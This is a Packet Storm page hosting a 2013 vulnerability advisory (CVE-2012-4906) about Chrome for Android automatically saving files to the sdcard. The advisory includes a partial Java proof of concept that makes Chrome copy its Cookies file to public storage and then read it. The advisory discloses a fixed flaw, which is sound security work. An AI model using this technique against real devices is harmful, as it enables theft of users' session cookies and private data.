exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Chrome For Android Download Function Information Disclosure

Chrome For Android Download Function Information Disclosure
Posted Jan 8, 2013
Authored by Takeshi Terada

Chrome for Android suffers from an issue where a malicious application has the ability to steal private information. Version 18.0.1025308 was released to address this vulnerability.

tags | exploit, info disclosure
advisories | CVE-2012-4906
SHA-256 | d32b410ecbaee0bf30696c5cc4ecfbba670e0931bde59217b08a9f1e54df5589

Chrome For Android Download Function Information Disclosure

Change Mirror Download
CVE Number:         CVE-2012-4906
Title: Chrome for Android - Download Function Information Disclosure
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability

Overview:
Rogue Android apps can steal private information such as Cookie file of Chrome,
by abusing automatic download functionality of Chrome for Android.

Details:
When Chrome for Android (v18.0.1025123) loads non-renderable contents such as
binary files, Chrome for Android automatically saves them in public place (sdcard)
without asking the users whether they wish to do so or not.

Therefore, malicious Android apps can steal such contents by below method.

1. A malicious app forces Chrome to load such contents.
2. Chrome automatically save it to sdcard.
2. The malicious app read the downloaded file in sdcard.

By this method, malicious apps can gain access to both local contents such as
the Cookie file of Chrome, and possibly online contents.

Such behaivior of Chrome does not matter in PC world, but it does in Android
world, because they are different in security model.

Proof of Concept:
// This is a part of malicious Android app.
public void attack() {
try {
// let Chrome app load its Cookies file, so that Chrome app
// automatically save it to /sdcard/Download/ directory.
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
startActivity(intent);

// wait a few seconds
Thread.sleep(3000);

// read the Cookie file (/sdcard/Download/Cookies.bin)
FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
...
}

Timeline:
2012/07/07 Reported to Google security team
2012/08/25 Re-reported to Chrome security team
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory

Recommendation:
Upgrade to the latest version.

Reference:
https://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144820
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close